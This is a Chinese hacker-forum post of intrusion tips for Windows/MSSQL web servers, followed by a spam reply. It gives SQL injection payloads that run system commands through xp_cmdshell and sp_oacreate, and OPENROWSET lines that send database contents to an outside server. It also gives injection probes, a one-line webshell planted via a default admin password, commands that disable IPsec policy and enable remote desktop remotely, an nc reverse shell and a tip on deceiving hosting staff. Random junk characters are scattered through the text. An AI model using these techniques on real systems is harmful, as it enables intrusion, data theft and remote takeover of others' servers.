找回密码
 立即注册
查看: 4664|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关6 K' E7 o) W. _
) M' T( C6 @% f2 d1 }7 X5 K) m% ]

5 B: {* Y* G% j7 h; m2 `. U" t  m" SSA点数据库分离搞法+语句:
# y% y% t# Z+ B/ N. i7 g" Q  b& a
4 t. m7 Y" Q" E7 L5 n注射点不显错,执行下面三条语句页面都返回正常。
+ w1 o/ }/ @" ^( _5 E) }and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')  o8 s; T# G: C0 v0 x- ^
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')2 \8 C# _. g& k8 l* u+ F' ]5 ]: k
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
7 _( T# y1 w3 T3 c可以列目录,判断系统为2000,web与数据库分离3 c8 w# F) y6 m) }7 e( e7 n
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
& o! c! ~4 G, G" g9 I在注射点上执行
8 C6 V# v5 L$ w* G' x) ?" |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--! Z' d6 a/ c2 ?7 p( u; w4 a6 r
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
& q1 j  `, v7 E1 ^: {, H$ ^还有我用NC监听得其他端口都没有得到IP。
" E$ _& J- s, I# j' h; h% B! v3 W6 m+ n4 ^
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。) r' [& ]6 T7 o4 |
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--/ ]2 R. _4 F" S* @( H, [% {' }
8 ?2 K$ l" D( p9 ~3 {+ \
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
+ u" _$ j2 R, K0 i1 S+ q1 e( W6 [8 ]- x# J% ?4 {+ X
现在就猜想是不是数据库是内网而且不能连外网。
: s% `% L7 |5 f' ]2 P, c8 T* G  |. E1 D" d

) w5 G7 `  c1 l, ]access导出txt文本代码
2 s( N3 P% O( {! F/ `1 WSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
% i+ _/ Y5 B; {' F  Z; s  W. v1 e0 H! @$ k0 W5 M  j
: s2 A: @2 N. F3 G$ K! _

% I: Y8 B3 T+ S7 q: r. \$ {自动跳转到指定网站代码头
2 S0 W5 W% m4 `" |<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>- |1 G) d) x. N# G! u/ `
6 ~( H8 u$ D5 e% q0 j
, p, R; L- @) e' C, u
入侵java or jsp站点时默认配置文件路径:
& r0 D% Y' a0 u" v) }& V8 U! A\web-inf\web.xml
, w( S9 }" |0 d6 S( f1 b" z: m3 j0 Ktomcat下的配置文件位置:
; [1 g+ _/ U# T: p$ J4 v$ z\conf\server.xml            (前面加上tomcat路径)
* @/ b  l6 Z# h% Q$ m3 @\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
+ E5 X% x5 V/ D" i" Q7 G  [# @: m$ K# C: T# Z
9 }" V7 z% U: E1 w( z
3 Y; K* M2 m- N- @
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
/ h! h5 O: Y2 ?3 S  G) W% }-1%23
: h2 m' ]0 V/ l; j' z) G>
9 ?9 {# s1 z; j<' [; d" t; B. t, N2 {3 H
1'+or+'1'='14 O, O( D4 s+ I- }/ c8 V1 d  k. H
id=8%bf% S  Z- T" A8 x, ]" }7 T
" x3 m0 ?" s! z5 Q) J
全新注入点检测试法:
+ ~! ]/ H$ o5 h9 }& @% O# a9 w5 k在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。. {. E; S. d  }$ K# X$ ?0 w
* M: c. A+ k& U: x
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。! y2 g3 p/ x  H; f! n, Z, A
9 v# Z- ?- i( j9 O
搜索型注入判断方法:
- O4 Q7 P( T% r; p北京%' and '1'='1' and '%'='8 G0 ?5 X, P$ k& i# \- m/ c; `
北京%' and '1'='2' and '%'='5 D! c: _3 x- G6 Z
& g4 N9 {1 O3 p. ~
; }4 p8 f& a" q8 `: C
COOKIES注入:
0 g$ L0 _' a1 m/ `( O2 w" ]  W4 e# @' O  S
javascript:alert(document.cookie="id="+escape("51 and 1=1"));+ d: b" V: @4 C' E6 N* U4 G

% p) O' n  O/ z3 u2000专业版查看本地登录用户命令:  j3 s! ^3 n" z# b
net config workstation
1 ], Q: I0 k8 P( n+ y5 n  y) q' f6 f4 s% @

% J% a$ P/ l5 W' c2003下查看ipsec配置和默认防火墙配置命令:
' C. y/ E' G5 k& }netsh firewall show config
" T" e5 U: d' K, U- H" d3 B( w, Snetsh ipsec static show all% ]" {2 K; ?2 `% w7 |9 `
0 }3 ~1 P/ ?/ i4 a8 ^/ D
不指派指定策略命令:
% X  R0 Q3 f) V- P, m# u% Tnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)/ w8 x: T2 x5 d2 x  v1 U, E3 [
netsh ipsec static show policy all  显示策略名" f5 V6 I+ s8 ]7 o
4 X  H# q- Y$ l; O3 D3 v. g6 h

" H  E0 ~9 Q, M* }/ ^猜管理员后台小技巧:5 J' p! }0 Y4 `: }& w
admin/left.asp
  i% O  P+ t4 X" Q2 Fadmin/main.asp- a; R" e7 b6 w5 ]2 z, ~
admin/top.asp
" D9 v$ ?6 s# {, G( Aadmin/admin.asp
$ b+ G) H, A& F5 F" L) u% {会现出菜单导航,然后迅雷下载全部链接
. N$ ~9 s, ?, X3 }# j% q4 G7 t8 D, ]

: K& c& q: x! j) C3 y3 j社会工程学:
: O9 o  r9 Q2 Q& P+ H用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人' B/ Y- u; r8 k1 ]
然后去骗客服4 E+ R3 v+ f* f$ T/ U
2 V3 u/ ~4 h/ K/ }6 I* E

; _5 V# Z3 |6 z. @5 K6 l. V统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
! w4 C. ^; @0 r* S! s! g9 z查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
( ?# S. ]& j8 A5 K/ e. d  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。. n/ F( N# D9 Y8 ^6 }* _1 V
! T( }6 c7 S2 g% u
' Z4 d# h3 \$ q

% H4 }9 }& D$ W. R2 |% N0 Y$ S6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
5 j% j3 a2 g6 V4 Z5 @# J/ }1 z
/ f( ~2 [% W; O( ~9 l& t# m3 Y: I, e& q' n* B4 @; [9 ]

% V# r  J2 y/ i; [% L6 eCMD加密注册表位置
3 @$ h+ L4 ]0 j' T" A) v(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
- A% U" s  l5 E/ v- D4 PAutoRun0 \2 p6 `& i3 p  ~

& ~1 |; _' i. j' z(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
% [  p( Q$ S* ?4 x& U0 V; A$ P! t3 ]AutoRun
! k! @# h  P0 A6 m0 H7 A  {5 h( L! z" j; N

  b7 h1 O$ ~4 R3 k# U: G在找注入时搜索Hidden,把他改成test1 O8 g( y9 g$ k( v

& q6 K3 ~4 P9 h) n( k
( Q, S9 x8 b  Y0 C
+ L/ }; U" F! Vmstsc /v:IP /console
: C* }. P  J/ n: E% @
; R3 w/ u6 }  ~- D  u
5 S9 s" P- I/ p4 B* w$ N一句话开3389:
* L/ `/ Q- X7 f& L, W' U2 p+ p: ~, S9 d+ M2 @
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  * W/ J4 t4 H/ @5 A# g
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
6 g6 _  Q9 G) h0 \/ B7 W/ }5 r# B! g

4 W2 y+ I, b5 ~" D" x7 z知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:# G& m' M/ \7 M' |
Insert into admin(user,pwd) values('test','test')
. G! Y8 K7 T& r5 ?% ^8 N
2 o, d2 A9 W3 N
8 p; \% ]7 ^- K& d& e5 z2 _3 WNC反弹9 a5 ]1 _7 I7 m0 Q
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   1 n, f2 V; ]* m9 c+ d# P8 k5 t
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
- r! t0 l$ d8 h( v; b6 v9 Z7 Y$ o8 R' E; c

, M1 a  l& N  n3 d) u3 k3 m在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
. g- @4 D( o- W' C- _' A
  R* F- D0 ?# X- h有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录+ z6 b7 `# r8 o. l9 c
例如:
9 g/ Y  U  A5 w9 T: n7 [subst k: d:\www\ 用d盘www目录替代k盘1 e$ U0 j' b. S) u$ ?5 a
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表